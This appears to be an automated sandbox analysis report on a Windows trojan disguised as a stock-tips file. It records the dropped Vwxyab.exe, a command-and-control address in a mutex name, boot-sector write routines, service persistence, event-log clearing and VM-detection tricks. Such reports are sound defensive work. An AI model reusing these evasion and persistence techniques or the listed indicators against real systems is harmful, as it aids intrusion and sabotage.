Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0042E78B	0_2_0042E78B
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00433803	0_2_00433803
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004078F0	0_2_004078F0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0042792B	0_2_0042792B
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004289FE	0_2_004289FE
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00412A67	0_2_00412A67
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00436B0C	0_2_00436B0C
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00427DFE	0_2_00427DFE
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00438E41	0_2_00438E41
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00408E60	0_2_00408E60
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00405F80	0_2_00405F80
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0042BFA3	0_2_0042BFA3
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0043704E	1_2_0043704E
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00429010	1_2_00429010
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00431024	1_2_00431024
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004281D2	1_2_004281D2
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004074B0	1_2_004074B0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004365CA	1_2_004365CA
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004285DE	1_2_004285DE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004046E0	1_2_004046E0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00437712	1_2_00437712
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0042E78B	1_2_0042E78B
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00433803	1_2_00433803
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004078F0	1_2_004078F0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0042792B	1_2_0042792B
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004289FE	1_2_004289FE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00412A67	1_2_00412A67
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00436B0C	1_2_00436B0C
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00427DFE	1_2_00427DFE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00438E41	1_2_00438E41
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00408E60	1_2_00408E60
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00405F80	1_2_00405F80
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0042BFA3	1_2_0042BFA3
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10016060	1_2_10016060
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000821C	1_2_1000821C
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10019430	1_2_10019430
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10017490	1_2_10017490
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100136C7	1_2_100136C7
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000E709	1_2_1000E709
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10017900	1_2_10017900
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100109FE	1_2_100109FE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10013A2B	1_2_10013A2B
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10019AC0	1_2_10019AC0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10017DB0	1_2_10017DB0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000DEA4	1_2_1000DEA4
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10018EB0	1_2_10018EB0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000EF15	1_2_1000EF15
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10013F14	1_2_10013F14
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10016FA0	1_2_10016FA0
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10019430	3_2_10019430
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10016060	3_2_10016060
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10017490	3_2_10017490
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10017900	3_2_10017900
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10017DB0	3_2_10017DB0
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100109FE	3_2_100109FE
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000821C	3_2_1000821C
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10013A2B	3_2_10013A2B
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000DEA4	3_2_1000DEA4
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10018EB0	3_2_10018EB0
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10019AC0	3_2_10019AC0
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100136C7	3_2_100136C7
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000E709	3_2_1000E709
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000EF15	3_2_1000EF15
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10013F14	3_2_10013F14
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10016FA0	3_2_10016FA0

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: String function: 00415744 appears 33 times
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: String function: 004271DA appears 146 times
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: String function: 0042720D appears 39 times
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: String function: 00428FAC appears 55 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 00415744 appears 33 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 004271DA appears 146 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 0042720D appears 39 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 10015A3C appears 50 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 10015818 appears 32 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 10015A36 appears 88 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 100158AC appears 84 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 00428FAC appears 55 times
Source: C:\Windows\Vwxyab.exe	Code function: String function: 1000CC7C appears 100 times

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe, 00000000.00000000.196480449.0000000000489000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDemo.EXE4 vs #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Binary or memory string: OriginalFilenameDemo.EXE4 vs #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Source: C:\Windows\Vwxyab.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@18/11@0/3

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10001E41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,FindCloseChangeNotification,	1_2_10001E41
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10003638 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	1_2_10003638
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10007762 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	1_2_10007762
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10001E41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,FindCloseChangeNotification,	3_2_10001E41
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10003638 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	3_2_10003638
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10007762 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	3_2_10007762

Source: C:\Windows\Vwxyab.exe	Code function: OpenSCManagerA,_local_unwind2,CreateServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,ChangeServiceConfig2A,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,lstrlenA,		1_2_10002FC4
Source: C:\Windows\Vwxyab.exe	Code function: OpenSCManagerA,_local_unwind2,CreateServiceA,ChangeServiceConfig2A,ChangeServiceConfig2A,ChangeServiceConfig2A,GetLastError,OpenServiceA,StartServiceA,StartServiceA,wsprintfA,lstrlenA,		3_2_10002FC4

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100035B9 CreateToolhelp32Snapshot,Process32First,_strupr,_strupr,_strupr,strcmp,Process32Next,CloseHandle,

1_2_100035B9

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100065AB GetCurrentDirectoryA,GetCurrentDirectoryA,GetCurrentDirectoryA,strcat,CoInitializeEx,CoCreateInstance,CoUninitialize,

1_2_100065AB

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00402260 FindResourceA,

0_2_00402260

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000B925 StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,strcpy,PathRemoveBackslashA,sprintf,CopyFileA,GetModuleFileNameA,SetFileAttributesA,CopyFileA,GetModuleFileNameA,SetFileAttributesA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,

1_2_1000B925

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000B925 StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,strcpy,PathRemoveBackslashA,sprintf,CopyFileA,GetModuleFileNameA,SetFileAttributesA,CopyFileA,GetModuleFileNameA,SetFileAttributesA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,		1_2_1000B925
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000B925 StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,strcpy,PathRemoveBackslashA,sprintf,CopyFileA,GetModuleFileNameA,SetFileAttributesA,CopyFileA,GetModuleFileNameA,SetFileAttributesA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,		3_2_1000B925

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

File created: C:\Users\Public\Documents\SVP7.PNG

Jump to behavior

Source: C:\Windows\Vwxyab.exe	Mutant created: \Sessions\1\BaseNamedObjects\103.119.44.216:8081:Vwxyab Defghijk
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4728:120:WilError_01

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: Shell32.dll	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: PathFileExistsA	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: SHLWAPI.dll	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: SHLWAPI.dll	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: KERNEL32.dll	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: GNP.	0_2_00403BC0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Command line argument: GNP.	0_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: Shell32.dll	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: PathFileExistsA	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: SHLWAPI.dll	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: SHLWAPI.dll	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: KERNEL32.dll	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: GNP.	1_2_00403BC0
Source: C:\Windows\Vwxyab.exe	Command line argument: GNP.	1_2_00403BC0

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Virustotal: Detection: 31%
Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

File read: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe 'C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe'
Source: unknown	Process created: C:\Windows\Vwxyab.exe C:\Windows\Vwxyab.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\Vwxyab.exe	Process created: C:\Windows\Vwxyab.exe C:\Windows\Vwxyab.exe Win7
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Vwxyab.exe	Process created: C:\Windows\Vwxyab.exe C:\Windows\Vwxyab.exe Win7	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Windows\Vwxyab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D7B70EE0-4340-11CF-B063-0020AFC2CD35}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00403140 LoadLibraryA,GetProcAddress,VirtualFree,LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_00403140

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Static PE information: real checksum: 0x8ed33 should be: 0xa5f4b
Source: Vwxyab.exe.0.dr	Static PE information: real checksum: 0x8ed33 should be: 0xa5f4b

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004272B2 push ecx; ret	0_2_004272C5
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00428FF1 push ecx; ret	0_2_00429004
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004272B2 push ecx; ret	1_2_004272C5
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00428FF1 push ecx; ret	1_2_00429004
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100158AC push eax; ret	1_2_100158CA
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100158E0 push eax; ret	1_2_1001590E
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100158AC push eax; ret	3_2_100158CA
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100158E0 push eax; ret	3_2_1001590E

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: CreateFileA,CloseHandle,DeviceIoControl,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, \\.\PhysicalDrive0	1_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0	1_2_100077D3
Source: C:\Windows\Vwxyab.exe	Code function: CreateFileA,CloseHandle,DeviceIoControl,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, \\.\PhysicalDrive0	3_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0	3_2_100077D3

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\Vwxyab.exe

Executable created and started: C:\Windows\Vwxyab.exe

Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

File created: C:\Windows\Vwxyab.exe

Jump to dropped file

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

File created: C:\Windows\Vwxyab.exe

Jump to dropped file

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: CreateFileA,CloseHandle,DeviceIoControl,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, \\.\PhysicalDrive0	1_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0	1_2_100077D3
Source: C:\Windows\Vwxyab.exe	Code function: CreateFileA,CloseHandle,DeviceIoControl,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, \\.\PhysicalDrive0	3_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0	3_2_100077D3

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\Vwxyab.exe

Key value created or modified: HKEY_USERS.DEFAULT\System\CurrentControlSet\Services\Vwxyab Defghijk Group

Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vwxyab Defghijk

Jump to behavior

Source: C:\Windows\Vwxyab.exe

1_2_1000B925

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004013B0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	0_2_004013B0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0040EA73 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_0040EA73
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004013B0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	1_2_004013B0
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0040EA73 IsIconic,GetWindowPlacement,GetWindowRect,	1_2_0040EA73

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100048B4 OpenEventLogA,ClearEventLogA,CloseEventLog,

1_2_100048B4

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000C51F LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_1000C51F

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect virtual machines (IN, VMware)

Show sources

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100023DA in eax, dx

1_2_100023DA

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\Vwxyab.exe

Section loaded: OutputDebugStringW count: 242

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10002380 rdtsc

1_2_10002380

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000239E sgdt fword ptr [esp-02h]

1_2_1000239E

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000239E sidt fword ptr [esp-02h]

1_2_1000239E

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100027E8 sldt word ptr [ebp-02h]

1_2_100027E8

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10002451 str word ptr [ebp-04h]

1_2_10002451

Source: C:\Windows\Vwxyab.exe	Code function: OpenSCManagerA,LocalAlloc,EnumServicesStatusA,strstr,strstr,strstr,strstr,strstr,CloseServiceHandle,		1_2_100021BC
Source: C:\Windows\Vwxyab.exe	Code function: OpenSCManagerA,LocalAlloc,EnumServicesStatusA,strstr,strstr,strstr,strstr,strstr,CloseServiceHandle,		3_2_100021BC

Source: C:\Windows\Vwxyab.exe

Window / User API: threadDelayed 980

Jump to behavior

Source: C:\Windows\Vwxyab.exe TID: 3868	Thread sleep count: 980 > 30	Jump to behavior
Source: C:\Windows\Vwxyab.exe TID: 3868	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Windows\Vwxyab.exe TID: 1048	Thread sleep count: 97 > 30	Jump to behavior
Source: C:\Windows\Vwxyab.exe TID: 1048	Thread sleep time: -48500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5320	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Vwxyab.exe	Last function: Thread delayed
Source: C:\Windows\Vwxyab.exe	Last function: Thread delayed
Source: C:\Windows\Vwxyab.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00402490 FindFirstFileA,FindClose,	0_2_00402490
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004165BB FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	0_2_004165BB
